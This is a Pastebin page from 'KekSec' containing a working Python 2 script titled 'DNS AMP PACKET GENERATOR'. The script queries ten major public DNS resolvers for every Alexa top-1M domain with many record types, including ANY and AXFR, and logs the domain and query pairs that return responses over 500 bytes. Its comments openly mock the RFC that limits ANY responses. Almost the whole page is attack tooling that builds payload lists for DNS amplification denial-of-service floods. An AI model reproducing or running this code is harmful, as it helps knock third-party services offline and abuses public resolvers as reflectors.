API tools faq
paste
KekSec

DNS AMP PACKET GENERATOR (parse alexa top 1m) [UPDATED]

KekSec
Jan 12th, 2021 (edited)
1,688
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.80 KB | None | 0 0
raw download clone embed print report
  1. #this program will parse alexas top 1 million domains for responses larger than 500 bytes. it tests every type of query available on 10 of the fastest dns servers on the planet.
  2. #enjoy. FUCK RFC 8482 !!!
  3. #coded by Freak @ Kek Security
  4. #pip2 install dnslib
  5. #updated at 1.12.2021 added multithreading for faster list generation
  6. import socket,os,random,select,time,threading
  7. from dnslib import DNSRecord
  8. #qtypes = {'a': '\x01', 'txt' : '\x10', 'cname' : '\x05', 'ns' : '\x02', 'mx', '\x0f', 'ptr' : '\x0c', 'any' : '\xff', 'axfr' : '\xfc', 'soa' : '\x06', 'HINFO' : '\r'}
  9. def make_dns_query_domain(domain):
  10.     def f(s):
  11.         return chr(len(s)) + s
  12.     parts = domain.split('.')
  13.     parts = list(map(f, parts))
  14.     return ''.join(parts)
  15. def make_dns_request_data(dns_query, qtype):
  16.     req = os.urandom(2) + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
  17.     req += dns_query
  18.     req += '\x00\x00' + qtype + '\x00\x01'
  19.     return req
  20. if raw_input("Download domain list? (y/n): ").lower().startswith("y"):
  21.     os.popen("wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv>top1m.txt")
  22. domains=open("top1m.txt","r").read().replace("\r", "").split("\n")
  23. servers=["1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4", "8.26.56.26", "8.20.247.20", "9.9.9.9", "149.112.112.112", "64.6.64.6", "64.6.65.6"]
  24. responses=[]
  25. global running
  26. running = 0
  27. def stringproc(s):
  28.     ch = (ord(c) for c in s)
  29.     return ''.join(('\\x%02x' % c) if c <= 255 else ('\\u%04x' % c) for c in ch)
  30. fh=open("queries.txt","w")
  31. def getdata(qname,fh):
  32.     global running
  33.     running += 1
  34.     for qtype in ['\x01', '\x10', '\x05','\x02', '\x0f', '\x0c', '\xff', '\xfc', '\x06','\r']:
  35.         try:
  36.             forward_addr = (random.choice(servers), 53) # dns and port
  37.             client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  38.             client.setblocking(0)
  39.             dnspkt=make_dns_request_data(make_dns_query_domain(qname), qtype)
  40.             client.sendto(dnspkt, forward_addr)
  41.             ready = select.select([client], [], [], 0.3)
  42.             if ready[0]:
  43.                 data, _ = client.recvfrom(1024*1024*1024)
  44.                 if len(data) > 500:
  45.                     print DNSRecord.parse(dnspkt)
  46.                     print DNSRecord.parse(data)
  47.                     print "Response size: " + str(len(data))
  48. #                    responses.append([len(data),qname,qtype])
  49.                     fh.write("['"+stringproc(qtype)+"','"+qname+"'],") #add size here if you'd like
  50.                     fh.flush()
  51.         except:
  52.             pass
  53.     running -= 1
  54. for qname in domains:
  55.     try:
  56.         while running >= 512:
  57.             time.sleep(0.4)
  58.         threading.Thread(target=getdata,args=(qname,fh,)).start()
  59.     except KeyboardInterrupt:
  60.         os.kill(os.getpid(),9)
  61.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!